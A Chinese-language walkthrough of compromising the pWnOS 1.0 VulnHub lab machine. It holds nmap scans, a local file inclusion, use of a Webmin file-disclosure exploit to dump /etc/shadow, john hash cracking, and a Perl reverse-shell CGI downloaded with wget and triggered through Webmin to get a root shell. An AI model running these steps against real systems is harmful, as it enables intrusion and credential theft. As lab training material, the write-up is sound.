当前位置: 首页 > news >正文

pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)

靶机介绍

来自 vulnhub

主机发现

┌──(kali㉿kali)-[~/testPwnos1.0]                                                                                                                                                                                                                                                                              20:33:00 [0/3]
└─$ sudo nmap -sn 10.10.10.0/24                                 
[sudo] password for kali:                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:32 CST                                                                                            
Nmap scan report for localhost (10.10.10.1)                                    
Host is up (0.00056s latency).                                                                                                   
MAC Address: 00:50:56:C0:00:08 (VMware)                                        
Nmap scan report for bogon (10.10.10.2)                         
Host is up (0.00010s latency).                                                                                                   
MAC Address: 00:50:56:F3:32:0E (VMware)                                                                                          
Nmap scan report for bogon (10.10.10.128)                                                                                        
Host is up (0.000096s latency).                                                                                                                               
MAC Address: 00:0C:29:83:4F:85 (VMware)                                        
Nmap scan report for bogon (10.10.10.131)                       
Host is up (0.00011s latency).                                                                                                   
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                                                                          
Nmap scan report for bogon (10.10.10.254)                                                                                        
Host is up (0.00011s latency).                                  
MAC Address: 00:50:56:EB:94:F3 (VMware)                         
Nmap scan report for bogon (10.10.10.129)                                                                                        
Host is up.                                                                                                                                                   
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.93 seconds                                                                                              ┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ sudo nmap --min-rate 1000 -p- 10.10.10.131                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:35 CST                                                               
Nmap scan report for localhost (10.10.10.131)                                  
Host is up (0.0013s latency).                                   
Not shown: 65530 closed tcp ports (reset)                       
PORT      STATE SERVICE                                                        
22/tcp    open  ssh                                                            
80/tcp    open  http                                                                                                                                          
139/tcp   open  netbios-ssn                                                    
445/tcp   open  microsoft-ds                                                   
10000/tcp open  snet-sensor-mgmt                                               
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds                                                                                                                                                                              ┌──(kali㉿kali)-[~/testPwnos1.0]                                               
└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.10.131                                                                                                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:43 CST                                                                                            
Warning: 10.10.10.131 giving up on port because retransmission cap hit (10).                                                                                  
Nmap scan report for localhost (10.10.10.131)                                  
Host is up (0.00050s latency).                                                 
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)                                                                    
PORT      STATE SERVICE                                                        
137/udp   open  netbios-ns                                                     
10000/udp open  ndmp                                                           
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        Nmap done: 1 IP address (1 host up) scanned in 72.84 seconds 

tcp 扫描,扫描服务版本,扫描操作系统

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo nmap -sT -sV -O -p22,80,139,445,10000 10.10.10.131                    
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:39 CST
Nmap scan report for localhost (10.10.10.131)
Host is up (0.00014s latency).PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|broadband router|remote management|media device|VoIP phone
Running (JUST GUESSING): Linux 2.6.X|2.4.X (98%), Linksys embedded (95%), Arris embedded (94%), Dell embedded (93%), LifeSize embedded (93%), ShoreTel embedded (93%), Netgear embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:linksys:wrv54g cpe:/h:dell:remote_access_card:7 cpe:/o:linux:linux_kernel:2.4 cpe:/h:shoretel:8800 cpe:/h:netgear:neotv550
Aggressive OS guesses: Linux 2.6.22 (embedded, ARM) (98%), Linux 2.6.22 - 2.6.23 (98%), Linux 2.6.9 - 2.6.33 (97%), Linksys WRV54G WAP (95%), Linksys WRT610Nv3 WAP (95%), Linux 2.6.18 - 2.6.32 (94%), Arr
is TG862G/CT cable modem (94%), Linux 2.6.24 (94%), Linux 2.6.19 - 2.6.36 (93%), Linux 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop                           
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.76 seconds

漏洞脚本扫描。80 端口的 /icons/,/index/,/php/ 是enum ,似乎有点价值

┌──(kali㉿kali)-[~/testPwnos1.0]                                                                                                                                                                                                                                                                                            
└─$ sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.131                                                                                                                                                                                                                                                              
[sudo] password for kali:                                                                                                                                                                                                                                                                                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 20:40 CST                                                                                                                                                                                                                                                          
Nmap scan report for localhost (10.10.10.131)                                                                                                                                                                                                                                                                               
Host is up (0.00027s latency).                                                                                                                                                                                                                                                                                              PORT      STATE SERVICE                                                                                                                                                                                                                                                                                                     
22/tcp    open  ssh                                                                                                                                                                                                                                                                                                         
80/tcp    open  http                                                                                                                                                                                                                                                                                                        
|_http-trace: TRACE is enabled                                                                                                                                
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                           
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                                                   
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                          
| http-slowloris-check:                                                                 
|   VULNERABLE:                                                                                                                                                                   
|   Slowloris DOS attack                                                                                                                                                        
|     State: LIKELY VULNERABLE                                                                                                                                                    
|     IDs:  CVE:CVE-2007-6750                                                            
|       Slowloris tries to keep many connections to the target web server open and hold                                                                       
|       them open as long as possible.  It accomplishes this by opening connections to                                                                      
|       the target web server and sending a partial request. By doing so, it starves                                                                          
|       the http server's resources causing Denial Of Service.                                                                                                
|                                                                                                                                                                               
|     Disclosure date: 2009-09-17                                                        
|     References:                                                                        
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                                              
|_      http://ha.ckers.org/slowloris/                                                                                                                                            
| http-enum:                                                                                                                                                                      
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'                                                       
|   /index/: Potentially interesting folder                                              
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'                                                         
139/tcp   open  netbios-ssn                                                                                                                                                       
445/tcp   open  microsoft-ds                                                                                                                                                      
10000/tcp open  snet-sensor-mgmt                                                         
| http-vuln-cve2006-3392:                                                                
|   VULNERABLE:                                                                
|   Webmin File Disclosure                                                               
|     State: VULNERABLE (Exploitable)                                                    
|     IDs:  CVE:CVE-2006-3392                                                                                                                                                     
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.                                                   
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences                                                     
|       to bypass the removal of "../" directory traversal sequences.                                                                                         
|                                                                              
|     Disclosure date: 2006-06-29                                              
|     References:                                                              
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392                                                                                          
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure                                                                               
|_      http://www.exploit-db.com/exploits/1997/                               
MAC Address: 00:0C:29:5E:18:C9 (VMware)                                        Host script results:                                                           
|_smb-vuln-ms10-054: false                                                     
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)                                                                                       
|_smb-vuln-ms10-061: false                                                     Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds    

web渗透

访问 80 端口
在这里插入图片描述观察 10000 端口跑 http 服务,尝试访问
在这里插入图片描述
(你这网站不保熟啊)
在这里插入图片描述
加个单引号,有报错回显,当前页似乎在包含一个文件显示,尝试利用文件包含
(这个参数是否可以通过模糊测试 fuzz 来找到呢?)
在这里插入图片描述果然存在文件包含
在这里插入图片描述
用curl 请求,看得清楚一些。curl 请求应当加引号,防止转义符转义
发现这几个用户有意思

vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                      
obama:x:1001:1001::/home/obama:/bin/bash                                                 
osama:x:1002:1002::/home/osama:/bin/bash                                                 
yomama:x:1003:1003::/home/yomama:/bin/bash     
┌──(kali㉿kali)-[~/testPwnos1.0]                                                         
└─$ curl 'http://10.10.10.131/index1.php?help=true&connect=/etc/passwd'                                                                                                           
<HTML>                                                                                   
<body>                                                                                   
<center><h1>Welcome to the pWnOS homepage!                                               
</h1></center>                                                                           <p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>                                                                                                                                                                                                                            <form name="form" method="GET" action="index2.php">                                      
<table border=1>                                                                         
<tr><td width=175>                                                                       
Name:                                                                                    
</td>                                                                                    
<td width=175>                                                                           
<input type = "text" name="name" size=25>                                                
</td>                                                                                    
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
</tr>                                                                                    
<tr>                                                                                     
<td>                                                                                     
Skillz:                                                                                  
</td>                                                                                    
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>                                                                                                         
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>                                                                                         
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>                                                                                           
</tr>                                                                                    
<tr><td width=175>                                                                       
<input type = "submit" name = "submit" value = "Please Help!">                           
</td>                                                                                    
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
<td>&nbsp;</td>                                                                          
</tr>                                                                                    </table>                                                                                 
</form>                                                                                  root:x:0:0:root:/root:/bin/bash                                                          
daemon:x:1:1:daemon:/usr/sbin:/bin/sh                                                    
bin:x:2:2:bin:/bin:/bin/sh                                                               
sys:x:3:3:sys:/dev:/bin/sh                                                               
sync:x:4:65534:sync:/bin:/bin/sync                                                       
games:x:5:60:games:/usr/games:/bin/sh                                                    
man:x:6:12:man:/var/cache/man:/bin/sh                                                    
lp:x:7:7:lp:/var/spool/lpd:/bin/sh                                                       
mail:x:8:8:mail:/var/mail:/bin/sh                                                        
news:x:9:9:news:/var/spool/news:/bin/sh                                                  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                                                
proxy:x:13:13:proxy:/bin:/bin/sh                                                         
www-data:x:33:33:www-data:/var/www:/bin/sh                                               
backup:x:34:34:backup:/var/backups:/bin/sh                                               
list:x:38:38:Mailing List Manager:/var/list:/bin/sh                                      
irc:x:39:39:ircd:/var/run/ircd:/bin/sh                                                   
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh                                                                                                           
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                                         
dhcp:x:100:101::/nonexistent:/bin/false                                                  
syslog:x:101:102::/home/syslog:/bin/false                                                
klog:x:102:103::/home/klog:/bin/false                                                    
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false                                
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin                                        
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                      
obama:x:1001:1001::/home/obama:/bin/bash                                                 
osama:x:1002:1002::/home/osama:/bin/bash                                                 
yomama:x:1003:1003::/home/yomama:/bin/bash                                               </body>                                                                                  
</HTML>          

看一看 80 端口 /php/ 的内容
在这里插入图片描述点击进入,不过没有密码。发现系统名称和版本暴露,下一步尝试 searchsploit

Welcome to phpMyAdmin 2.6.3-pl1

在这里插入图片描述不过跨站脚本没啥用

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit phpmyadmin 2.6.3                   
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path                                                                                                                  | php/webapps/12642.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

漏洞脚本利用

根据漏洞脚本扫描的结果,发现 10000 端口跑的是 webmin ,根据经验推测其可被利用
searchsploit 找一找

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit webmin          
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal                                                                                                          | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion                                                                                                                         | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                                                                                                                     | php/webapps/2451.txt
Webmin - Brute Force / Command Execution                                                                                                                                 | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                                                                                                                                        | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing                                                                                                              | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                                                                                                                                  | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                                                                                                                       | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                                                                                                                             | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                                                                                                                                       | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)                                                                                                    | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                                                                                                                                  | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)                                                                                                                     | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)                                                                                                   | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                                                                                                                                     | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)                                                                                                        | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)                                                                                                          | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)                                                                                                               | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)                                                                                                         | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authenticated)                                                                                                                     | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)                                                                                                               | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution                                                                                                                                | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure                                                                                                             | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure                                                                                                             | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)                                                                                                            | linux/webapps/47330.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

排除 metasploit 和 csrf 和 内核提权,发现 2017.pl 似乎可以使用

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ searchsploit webmin -m 2017.pl
[!] Could not find EDB-ID #Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File DisclosureURL: https://www.exploit-db.com/exploits/2017Path: /usr/share/exploitdb/exploits/multiple/remote/2017.plCodes: CVE-2006-3392Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos1.0/2017.pl

摸索一下这个脚本怎么用,成功运行后拿到 passwd 的内容,不过和之前 80 端口文件包含拿到的内容相同。

┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ ./2017.pl 10.10.10.131 10000 /etc/passwd                    
Usage: ./2017.pl <url> <port> <filename> <target>                                                                                
TARGETS are                                                     0  - > HTTP                                                    1  - > HTTPS                                                   
Define full path with file name                                 
Example: ./webmin.pl blah.com 10000 /etc/passwd                 ┌──(kali㉿kali)-[~/testPwnos1.0]                                
└─$ ./2017.pl 10.10.10.131 10000 /etc/passwd 0                  
WEBMIN EXPLOIT !!!!! coded by UmZ!                              
Comments and Suggestions are welcome at umz32.dll [at] gmail.com                                                                 
Vulnerability disclose at securitydot.net                       
I am just coding it in perl 'cuz I hate PHP!                    
Attacking 10.10.10.131 on port 10000!                           
FILENAME:  /etc/passwd                                          FILE CONTENT STARTED                                           -----------------------------------                            
root:x:0:0:root:/root:/bin/bash                                 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh                           
bin:x:2:2:bin:/bin:/bin/sh                                      
sys:x:3:3:sys:/dev:/bin/sh                                      
sync:x:4:65534:sync:/bin:/bin/sync                              
games:x:5:60:games:/usr/games:/bin/sh                           
man:x:6:12:man:/var/cache/man:/bin/sh                           
lp:x:7:7:lp:/var/spool/lpd:/bin/sh                              
mail:x:8:8:mail:/var/mail:/bin/sh                               
news:x:9:9:news:/var/spool/news:/bin/sh                         
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                       
proxy:x:13:13:proxy:/bin:/bin/sh                                
www-data:x:33:33:www-data:/var/www:/bin/sh                      
backup:x:34:34:backup:/var/backups:/bin/sh                      
list:x:38:38:Mailing List Manager:/var/list:/bin/sh                                                                              
irc:x:39:39:ircd:/var/run/ircd:/bin/sh                          
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh                                                          
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                
dhcp:x:100:101::/nonexistent:/bin/false                         
syslog:x:101:102::/home/syslog:/bin/false                       
klog:x:102:103::/home/klog:/bin/false                           
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false                                                                        
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin               
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash                                                                              
obama:x:1001:1001::/home/obama:/bin/bash                        
osama:x:1002:1002::/home/osama:/bin/bash                        
yomama:x:1003:1003::/home/yomama:/bin/bash                      -------------------------------------  

之前 80 端口的网页文件包含没法读 shadow,于是尝试用利用脚本读 shadow。
居然可以读到 shadow

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ ./2017.pl 10.10.10.131 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.131 on port 10000!
FILENAME:  /etc/shadowFILE CONTENT STARTED-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::-------------------------------------

恰好拿到我们关心用户的密码的哈希 (居然也拿到了 root 的密码哈希)

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

密码破解

尝试破解。 shadow 内容的 md5 可用 john 破解,其余 md5 或 sha-1 可用 hashcat 破解。
拿到一个密码,vmware 的 密码是 h4ckm3 (味道很冲的密码)

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ckm3           (vmware)     
1g 0:00:03:18 DONE (2024-10-05 22:20) 0.005031g/s 70943p/s 322002c/s 322002C/s  ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

补充额外知识点:
如果拿到 passwd 和 shadow ,可以尝试使用 unshadow 把二者合起来,如下
unshadow passwd shadows > unshadow.txt

连 ssh ,这里涉及 ssh 参数调整 -oHostKeyAlgorithms= 指定加密算法

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ssh vmware@10.10.10.131                   
[sudo] password for kali: 
Unable to negotiate with 10.10.10.131 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
RSA key fingerprint is SHA256:+C7UA7dQ1B/8zVWHRBD7KeNNfjuSBrtQBMZGd6qoR9w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (RSA) to the list of known hosts.
vmware@10.10.10.131's password: 
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ 

拿到初级 shell 后

做一个基础的信息收集
当前账号没有 sudo 权限,考虑提权

vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$ ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000link/ether 00:0c:29:5e:18:c9 brd ff:ff:ff:ff:ff:ffinet 10.10.10.131/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe5e:18c9/64 scope link valid_lft forever preferred_lft forever
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:~$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
vmware@ubuntuvm:~$ python --version
Python 2.5.1
vmware@ubuntuvm:~$ python -c "import pty;pty.spawn('/bin/bash')"

看一下计划任务,似乎没有

vmware@ubuntuvm:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

看一下网站目录。webmin 和 www 由 root 用户创建,权限比较高。结合 webmin 能读 shadow 文件,推测这两个目录权限较高,可作为突破口

vmware@ubuntuvm:~$ cd /var
vmware@ubuntuvm:/var$ ls -liah
total 52K
244801 drwxr-xr-x 15 root root  4.0K 2008-06-10 13:28 .2 drwxr-xr-x 21 root root  4.0K 2008-06-10 06:37 ..
261122 drwxr-xr-x  2 root root  4.0K 2008-06-10 06:28 backups
244808 drwxr-xr-x  9 root root  4.0K 2008-06-10 07:07 cache
244804 drwxr-xr-x 23 root root  4.0K 2008-06-10 07:08 lib
261125 drwxrwsr-x  2 root staff 4.0K 2007-10-08 05:47 local7612 drwxrwxrwt  3 root root    60 2024-10-05 07:27 lock
261126 drwxr-xr-x 11 root root  4.0K 2024-10-05 07:27 log
262195 drwxrwsr-x  2 root mail  4.0K 2008-06-10 06:24 mail
262194 drwxr-xr-x  2 root root  4.0K 2008-06-10 06:24 opt7608 drwxr-xr-x 11 root root   400 2024-10-05 09:48 run
261127 drwxr-xr-x  5 root root  4.0K 2008-06-10 07:07 spool
261128 drwxrwxrwt  2 root root  4.0K 2007-10-08 05:47 tmp
344741 drwx------  2 root bin   4.0K 2008-06-10 13:31 webmin
295040 drwxr-xr-x  3 root root  4.0K 2008-06-12 09:55 www
vmware@ubuntuvm:/var$ 

构造 perl 的 cgi 反弹 shell
vim 修改 反弹 ip 的地址为 kali
开 php 服务器,准备让靶机下载文件

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ ls
2017.pl  hash  passwd  shadow  shell.cgi  unshadow.txt┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ vim shell.cgi ┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo php -S 0:80                                                      
[sudo] password for kali: 
[Sat Oct  5 23:04:23 2024] PHP 8.2.21 Development Server (http://0:80) started

使用靶机下载 .cgi 并给执行权限

vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ wget http://10.10.10.129/shell.cgi
--10:06:15--  http://10.10.10.129/shell.cgi=> `shell.cgi'
Connecting to 10.10.10.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,715 (3.6K)100%[====================================>] 3,715         --.--K/s             10:06:15 (505.77 MB/s) - `shell.cgi' saved [3715/3715]vmware@ubuntuvm:~$ ls
shell.cgi
vmware@ubuntuvm:~$ chmod +x shell.cgi 

监听,尝试收反弹 shell

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ncat -lvnp 1234                                   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234

之前的 perl 脚本可以请求指定位置文件,结合 perl 的 CGI 脚本执行需要网络请求的特性,使用脚本请求在 kali 构造好的反弹 shell。
(似乎也可尝试 本地执行)

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ./2017.pl 10.10.10.131 10000 /home/vmware/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.131 on port 10000!
FILENAME:  /home/vmware/shell.cgiFILE CONTENT STARTED-----------------------------------
Browser IP address appears to be: 10.10.10.129<p>-------------------------------------

从监听收到反弹 shell,拿下 root

┌──(kali㉿kali)-[~/testPwnos1.0]
└─$ sudo ncat -lvnp 1234                                   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.131:44869.10:13:26 up  2:45,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
vmware   pts/0    10.10.10.129     09:25    6:41m  0.07s  0.01s python -c impor
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# 
# whoami
root
# ip a
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000link/ether 00:0c:29:5e:18:c9 brd ff:ff:ff:ff:ff:ffinet 10.10.10.131/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe5e:18c9/64 scope link valid_lft forever preferred_lft forever
# sudo -l
User root may run the following commands on this host:(ALL) ALL
# 

总结

